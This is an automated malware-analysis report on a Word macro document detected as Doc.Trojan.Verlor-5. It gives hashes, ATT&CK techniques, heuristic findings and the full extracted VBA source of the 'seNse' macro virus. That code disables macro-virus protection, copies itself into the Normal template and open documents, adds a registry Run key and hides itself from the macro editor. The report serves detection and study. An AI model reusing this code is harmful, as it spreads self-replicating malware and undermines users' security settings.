Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 226cb118a1677eed…

MALICIOUS

Office (OLE)

Size: 33.0 KB
Created: 1999-12-15 03:47:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: d22c5af66e6cf3f917638cc6e25d19d0
SHA-1: 8a16c2e07664eb012d666f514b4a0227ab7d7723
SHA-256: 226cb118a1677eed517cbbb1f38aa1035861ed74599fe59b9dbec444cc205b42
Risk Score: 296

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The sample contains legacy WordBasic markers and VBA macros, including an Auto_Close macro. The Auto_Close macro attempts to export the current macro code to a DLL and import it into the Normal template, likely to evade detection or ensure persistence. It also attempts to establish persistence by writing a VBScript to the registry Run key: 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\seNse' pointing to 'C:\Windows\seNse.a.vbs'.

Heuristics (7)

  • ClamAV: Doc.Trojan.Verlor-5 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Verlor-5
  • VBA macros detected [medium, 4 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering [critical] (OLE_VBA_MACRO_VIRUS_REPLICATION)
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
    NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.deletelines 1, NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.CountOfLines
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script:
    Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
  • Auto_Close macro [low] (OLE_VBA_AUTOCLOSE)
    Auto_Close macro
    Matched line in script:
    Sub AutoClose()
  • Environ() call (env variable access) [low] (OLE_VBA_ENVIRON)
    Environ() call (env variable access)
    Matched line in script:
    windir = Environ("windir")
  • Legacy WordBasic macro-virus markers [high] (OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   5114 bytes
SHA-256: e8ce4c985f51c522e003f1d0d25f26c51ee2fac5871bd04c5bbb7a5c2ee40f6f
Detection: ClamAV: Doc.Trojan.Verlor-5
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoClose()


'MyName = seNse
'WrittenBy = f0re [UC/Skamwerks/DVC]
'Version = .A (1.2)
On Error Resume Next
windir = Environ("windir")
If Dir(windir & "\tempad.dll") <> "" Then Kill (windir & "\tempad.dll")
If Dir(windir & "\tempnt.dll") <> "" Then Kill (windir & "\tempnt.dll")
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
If NormalTemplate.VBProject.VBComponents.Item("Module1").CodeModule1.Lines(3, 1) <> "'MyName = seNse" Then
ActiveDocument.VBProject.VBComponents("Module1").Export (windir & "\tempad.dll")
NormalTemplate.VBProject.VBComponents.import (windir & "\tempad.dll")
NormalTemplate.Save

End If
If ActiveDocument.VBProject.VBComponents.Item("Module1").CodeModule1.Lines(3, 1) <> "'MyName = seNse" Then
NormalTemplate.VBProject.VBComponents("Module1").Export (windir & "\tempnt.dll")
ActiveDocument.VBProject.VBComponents.import (windir & "\tempnt.dll")
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End Sub
Sub Stealth()
On Error Resume Next
windir = Environ("windir")
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\software\", "RegisteredOwner") = "f0re"
System.PrivateProfileString("", "HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\run", "seNse") = windir & "\seNse.vbs"
If Dir(windir & "\seNse.a.vbs") <> "" Then Kill (windir & "\seNse.a.vbs")
If Dir(windir & "\seNse.a.dll") <> "" Then Kill (windir & "\seNse.a.dll")
Open "c:\windows\seNse.a.vbs" For Append As #1
Print #1, "On error resume next"
Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "WordObj.Options.SaveNormalPrompt = False"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.remove WordObj.NormalTemplate.VBProject.VBComponents(" & Chr(34) & "Module1" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.import (" & Chr(34) & windir & "\seNse.a.dll" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "set NT = nothing"
Print #1, "WordObj.Quit"
Close #1
NormalTemplate.VBProject.VBComponents("Module1").Export (windir & "\seNse.a.dll")
End Sub
Sub ViewVBCode()
On Error Resume Next
Call Stealth
For X = 1 To NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.CountOfLines
 Code = Code & NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.Lines(X, 1) & Chr(13)
Next X
NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.deletelines 1, NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.CountOfLines
NormalTemplate.Saved = True
Docnumber = Application.Documents.Count
If Docnumber >= 1 Then
For X = 1 To Docnumber
Documents(X).VBProject.VBComponents("Module1").CodeModule1.deletelines 1, Documents(X).VBProject.VBComponents("Module1").CodeModule1.CountOfLines
Documents(X).Saved = True
Next X
End If
Application.ShowVisualBasicEditor = True
While Application.ShowVisualBasicEditor = True
DoEvents
Wend
NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.InsertLines 1, Code
NormalTemplate.Save
Docnumber = Application.Documents.Count
If Docnumber >= 1 Then
For X = 1 To Docnumber
Documents(X).VBProject.VBComponents("Module1").CodeModule1.InsertLines 1, Code
Documents(X).SaveAs Documents(X).FullName
Next X
End If
End Sub
Sub ToolsMacro()
On Error Resume Next
For X = 1 To NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.CountOfLines
 codeNT = codeNT & NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.Lines(X, 1) & Chr(13)
Next X
NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.deletelines 1, NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.CountOfLines
NormalTemplate.Saved = True
Docnumber = Application.Documents.Count
If Docnumber >= 1 Then
 For Y = 1 To ActiveDocument.VBProject.VBComponents("Module1").CodeModule1.CountOfLines
  CodeAD = CodeAD & ActiveDocument.VBProject.VBComponents("Module1").CodeModule1.Lines(Y, 1) & Chr(13)
 Next Y
 For X = 1 To Docnumber
 Documents(X).VBProject.VBComponents("Module1").CodeModule1.deletelines 1, Documents(X).VBProject.VBComponents("Module1").CodeModule1.CountOfLines
 Documents(X).Saved = True
 Next X
 End If
Application.Dialogs(wdDialogToolsMacro).Show
If Application.ShowVisualBasicEditor = False Then
 NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.InsertLines 1, codeNT
 NormalTemplate.Save
 If Docnumber >= 1 Then
 For X = 1 To Docnumber
Documents(X).VBProject.VBComponents("Module1").CodeModule1.InsertLines 1, CodeAD
Documents(X).SaveAs Documents(X).FullName
Next X
End If
End If
End Sub
'Put this code in a Module1 called "Module1". I created a form of stealth.
'However not full stealth. But it's a nice attempt i think/hope :).
End Sub